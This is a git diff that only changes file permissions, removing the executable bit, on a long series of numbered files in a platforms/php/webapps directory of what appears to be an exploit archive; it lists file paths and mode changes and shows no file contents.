mode 100644 diff --git a/platforms/php/webapps/4767.txt b/platforms/php/webapps/4767.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4769.txt b/platforms/php/webapps/4769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4770.txt b/platforms/php/webapps/4770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4771.txt b/platforms/php/webapps/4771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4772.txt b/platforms/php/webapps/4772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4775.txt b/platforms/php/webapps/4775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4776.txt b/platforms/php/webapps/4776.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4777.txt b/platforms/php/webapps/4777.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4778.txt b/platforms/php/webapps/4778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4779.php b/platforms/php/webapps/4779.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4780.txt b/platforms/php/webapps/4780.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4781.php b/platforms/php/webapps/4781.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4782.txt b/platforms/php/webapps/4782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4783.txt b/platforms/php/webapps/4783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4785.txt b/platforms/php/webapps/4785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4788.txt b/platforms/php/webapps/4788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4789.php b/platforms/php/webapps/4789.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4790.txt b/platforms/php/webapps/4790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4791.txt b/platforms/php/webapps/4791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4793.txt b/platforms/php/webapps/4793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4795.txt b/platforms/php/webapps/4795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4796.txt b/platforms/php/webapps/4796.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4798.php b/platforms/php/webapps/4798.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4799.txt b/platforms/php/webapps/4799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4800.txt b/platforms/php/webapps/4800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4802.txt b/platforms/php/webapps/4802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4804.txt b/platforms/php/webapps/4804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4805.txt b/platforms/php/webapps/4805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4807.php b/platforms/php/webapps/4807.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4808.txt b/platforms/php/webapps/4808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4809.txt b/platforms/php/webapps/4809.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4810.txt b/platforms/php/webapps/4810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4811.txt b/platforms/php/webapps/4811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4812.txt b/platforms/php/webapps/4812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4813.txt b/platforms/php/webapps/4813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4814.txt b/platforms/php/webapps/4814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4815.txt b/platforms/php/webapps/4815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4816.txt b/platforms/php/webapps/4816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4817.txt b/platforms/php/webapps/4817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4821.txt b/platforms/php/webapps/4821.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4822.txt b/platforms/php/webapps/4822.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4827.txt b/platforms/php/webapps/4827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4828.txt b/platforms/php/webapps/4828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4830.txt b/platforms/php/webapps/4830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4831.txt b/platforms/php/webapps/4831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4832.php b/platforms/php/webapps/4832.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4833.txt b/platforms/php/webapps/4833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4834.txt b/platforms/php/webapps/4834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4836.txt b/platforms/php/webapps/4836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4838.txt b/platforms/php/webapps/4838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4840.php b/platforms/php/webapps/4840.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4841.txt b/platforms/php/webapps/4841.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4843.txt b/platforms/php/webapps/4843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4844.txt b/platforms/php/webapps/4844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4846.txt b/platforms/php/webapps/4846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4847.txt b/platforms/php/webapps/4847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4849.txt b/platforms/php/webapps/4849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4850.txt b/platforms/php/webapps/4850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4851.txt b/platforms/php/webapps/4851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4852.txt b/platforms/php/webapps/4852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4853.php b/platforms/php/webapps/4853.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4854.txt b/platforms/php/webapps/4854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4855.txt b/platforms/php/webapps/4855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4857.txt b/platforms/php/webapps/4857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4859.txt b/platforms/php/webapps/4859.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4861.txt b/platforms/php/webapps/4861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4864.txt b/platforms/php/webapps/4864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4865.txt b/platforms/php/webapps/4865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4870.txt b/platforms/php/webapps/4870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4871.php b/platforms/php/webapps/4871.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4872.txt b/platforms/php/webapps/4872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4876.txt b/platforms/php/webapps/4876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4879.php b/platforms/php/webapps/4879.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4880.php b/platforms/php/webapps/4880.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4882.txt b/platforms/php/webapps/4882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4883.txt b/platforms/php/webapps/4883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4884.php b/platforms/php/webapps/4884.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4887.htm b/platforms/php/webapps/4887.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4888.txt b/platforms/php/webapps/4888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4889.txt b/platforms/php/webapps/4889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4890.txt b/platforms/php/webapps/4890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4891.php b/platforms/php/webapps/4891.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4895.txt b/platforms/php/webapps/4895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4898.txt b/platforms/php/webapps/4898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4899.txt b/platforms/php/webapps/4899.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4901.txt b/platforms/php/webapps/4901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4902.txt b/platforms/php/webapps/4902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4904.txt b/platforms/php/webapps/4904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4912.txt b/platforms/php/webapps/4912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4914.txt b/platforms/php/webapps/4914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4915.txt b/platforms/php/webapps/4915.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4916.txt b/platforms/php/webapps/4916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4917.txt b/platforms/php/webapps/4917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4919.txt b/platforms/php/webapps/4919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4920.txt b/platforms/php/webapps/4920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4922.txt b/platforms/php/webapps/4922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4924.php b/platforms/php/webapps/4924.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4925.txt b/platforms/php/webapps/4925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4927.php b/platforms/php/webapps/4927.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4928.txt b/platforms/php/webapps/4928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4929.txt b/platforms/php/webapps/4929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4930.txt b/platforms/php/webapps/4930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4936.txt b/platforms/php/webapps/4936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4937.txt b/platforms/php/webapps/4937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4939.txt b/platforms/php/webapps/4939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4942.txt b/platforms/php/webapps/4942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4943.txt b/platforms/php/webapps/4943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4944.txt b/platforms/php/webapps/4944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4945.txt b/platforms/php/webapps/4945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4950.php b/platforms/php/webapps/4950.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4951.txt b/platforms/php/webapps/4951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4952.txt b/platforms/php/webapps/4952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4953.txt b/platforms/php/webapps/4953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4954.txt b/platforms/php/webapps/4954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4955.txt b/platforms/php/webapps/4955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4956.txt b/platforms/php/webapps/4956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4957.txt b/platforms/php/webapps/4957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4958.txt b/platforms/php/webapps/4958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4960.txt b/platforms/php/webapps/4960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4961.php b/platforms/php/webapps/4961.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4964.php b/platforms/php/webapps/4964.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4965.php b/platforms/php/webapps/4965.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4968.txt b/platforms/php/webapps/4968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4969.txt b/platforms/php/webapps/4969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4973.txt b/platforms/php/webapps/4973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4975.txt b/platforms/php/webapps/4975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4976.txt b/platforms/php/webapps/4976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4980.txt b/platforms/php/webapps/4980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4984.txt b/platforms/php/webapps/4984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4985.txt b/platforms/php/webapps/4985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4989.txt b/platforms/php/webapps/4989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4990.txt b/platforms/php/webapps/4990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4991.txt b/platforms/php/webapps/4991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4992.txt b/platforms/php/webapps/4992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4993.txt b/platforms/php/webapps/4993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5000.txt b/platforms/php/webapps/5000.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5001.txt b/platforms/php/webapps/5001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5002.txt b/platforms/php/webapps/5002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5003.txt b/platforms/php/webapps/5003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5006.txt b/platforms/php/webapps/5006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5007.txt b/platforms/php/webapps/5007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5008.txt b/platforms/php/webapps/5008.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5009.txt b/platforms/php/webapps/5009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5010.txt b/platforms/php/webapps/5010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5011.txt b/platforms/php/webapps/5011.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5013.php b/platforms/php/webapps/5013.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5014.txt b/platforms/php/webapps/5014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5015.txt b/platforms/php/webapps/5015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5016.txt b/platforms/php/webapps/5016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5017.php b/platforms/php/webapps/5017.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5019.txt b/platforms/php/webapps/5019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5020.txt b/platforms/php/webapps/5020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5021.txt b/platforms/php/webapps/5021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5022.txt b/platforms/php/webapps/5022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5026.txt b/platforms/php/webapps/5026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5027.txt b/platforms/php/webapps/5027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5029.txt b/platforms/php/webapps/5029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5030.txt b/platforms/php/webapps/5030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5031.txt b/platforms/php/webapps/5031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5033.txt b/platforms/php/webapps/5033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5034.txt b/platforms/php/webapps/5034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5035.txt b/platforms/php/webapps/5035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5037.txt b/platforms/php/webapps/5037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5039.txt b/platforms/php/webapps/5039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5040.txt b/platforms/php/webapps/5040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5041.txt b/platforms/php/webapps/5041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5042.txt b/platforms/php/webapps/5042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5047.txt b/platforms/php/webapps/5047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5053.txt b/platforms/php/webapps/5053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5055.txt b/platforms/php/webapps/5055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5056.txt b/platforms/php/webapps/5056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5057.txt b/platforms/php/webapps/5057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5058.txt b/platforms/php/webapps/5058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5059.txt b/platforms/php/webapps/5059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5060.txt b/platforms/php/webapps/5060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5061.txt b/platforms/php/webapps/5061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5062.txt b/platforms/php/webapps/5062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5064.txt b/platforms/php/webapps/5064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5065.txt b/platforms/php/webapps/5065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5066.php b/platforms/php/webapps/5066.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5068.txt b/platforms/php/webapps/5068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5071.txt b/platforms/php/webapps/5071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5072.txt b/platforms/php/webapps/5072.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5073.txt b/platforms/php/webapps/5073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5074.php b/platforms/php/webapps/5074.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5075.txt b/platforms/php/webapps/5075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5076.txt b/platforms/php/webapps/5076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5080.txt b/platforms/php/webapps/5080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5081.txt b/platforms/php/webapps/5081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5082.txt b/platforms/php/webapps/5082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5083.txt b/platforms/php/webapps/5083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5084.txt b/platforms/php/webapps/5084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5089.txt b/platforms/php/webapps/5089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5094.txt b/platforms/php/webapps/5094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5095.txt b/platforms/php/webapps/5095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5096.txt b/platforms/php/webapps/5096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5097.txt b/platforms/php/webapps/5097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5098.txt b/platforms/php/webapps/5098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5099.php b/platforms/php/webapps/5099.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5103.txt b/platforms/php/webapps/5103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5104.txt b/platforms/php/webapps/5104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5108.txt b/platforms/php/webapps/5108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5109.txt b/platforms/php/webapps/5109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5115.txt b/platforms/php/webapps/5115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5116.txt b/platforms/php/webapps/5116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5117.txt b/platforms/php/webapps/5117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5118.txt b/platforms/php/webapps/5118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5119.txt b/platforms/php/webapps/5119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5121.txt b/platforms/php/webapps/5121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5123.txt b/platforms/php/webapps/5123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5124.txt b/platforms/php/webapps/5124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5125.txt b/platforms/php/webapps/5125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5126.txt b/platforms/php/webapps/5126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5127.txt b/platforms/php/webapps/5127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5128.txt b/platforms/php/webapps/5128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5129.txt b/platforms/php/webapps/5129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5130.txt b/platforms/php/webapps/5130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5132.txt b/platforms/php/webapps/5132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5133.txt b/platforms/php/webapps/5133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5134.txt b/platforms/php/webapps/5134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5135.txt b/platforms/php/webapps/5135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5136.txt b/platforms/php/webapps/5136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5137.txt b/platforms/php/webapps/5137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5138.txt b/platforms/php/webapps/5138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5139.txt b/platforms/php/webapps/5139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5140.txt b/platforms/php/webapps/5140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5145.txt b/platforms/php/webapps/5145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5146.txt b/platforms/php/webapps/5146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5147.txt b/platforms/php/webapps/5147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5148.txt b/platforms/php/webapps/5148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5149.txt b/platforms/php/webapps/5149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5154.txt b/platforms/php/webapps/5154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5155.txt b/platforms/php/webapps/5155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5156.txt b/platforms/php/webapps/5156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5157.txt b/platforms/php/webapps/5157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5158.txt b/platforms/php/webapps/5158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5159.txt b/platforms/php/webapps/5159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5160.txt b/platforms/php/webapps/5160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5161.txt b/platforms/php/webapps/5161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5162.txt b/platforms/php/webapps/5162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5163.txt b/platforms/php/webapps/5163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5164.php b/platforms/php/webapps/5164.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5165.php b/platforms/php/webapps/5165.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5166.htm b/platforms/php/webapps/5166.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5168.txt b/platforms/php/webapps/5168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5169.txt b/platforms/php/webapps/5169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5170.txt b/platforms/php/webapps/5170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5171.txt b/platforms/php/webapps/5171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5172.txt b/platforms/php/webapps/5172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5173.txt b/platforms/php/webapps/5173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5174.txt b/platforms/php/webapps/5174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5175.txt b/platforms/php/webapps/5175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5176.txt b/platforms/php/webapps/5176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5177.txt b/platforms/php/webapps/5177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5178.txt b/platforms/php/webapps/5178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5179.txt b/platforms/php/webapps/5179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5180.txt b/platforms/php/webapps/5180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5181.txt b/platforms/php/webapps/5181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5182.txt b/platforms/php/webapps/5182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5183.txt b/platforms/php/webapps/5183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5186.txt b/platforms/php/webapps/5186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5194.txt b/platforms/php/webapps/5194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5195.txt b/platforms/php/webapps/5195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5197.txt b/platforms/php/webapps/5197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5198.txt b/platforms/php/webapps/5198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5199.txt b/platforms/php/webapps/5199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5200.txt b/platforms/php/webapps/5200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5202.txt b/platforms/php/webapps/5202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5203.txt b/platforms/php/webapps/5203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5206.txt b/platforms/php/webapps/5206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5207.txt b/platforms/php/webapps/5207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5208.txt b/platforms/php/webapps/5208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5209.txt b/platforms/php/webapps/5209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5211.txt b/platforms/php/webapps/5211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5214.txt b/platforms/php/webapps/5214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5216.txt b/platforms/php/webapps/5216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5218.txt b/platforms/php/webapps/5218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5219.php b/platforms/php/webapps/5219.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5220.php b/platforms/php/webapps/5220.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5221.txt b/platforms/php/webapps/5221.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5222.txt b/platforms/php/webapps/5222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5223.txt b/platforms/php/webapps/5223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5226.txt b/platforms/php/webapps/5226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5231.php b/platforms/php/webapps/5231.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5232.txt b/platforms/php/webapps/5232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5233.txt b/platforms/php/webapps/5233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5234.txt b/platforms/php/webapps/5234.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5236.txt b/platforms/php/webapps/5236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5237.txt b/platforms/php/webapps/5237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/5239.php 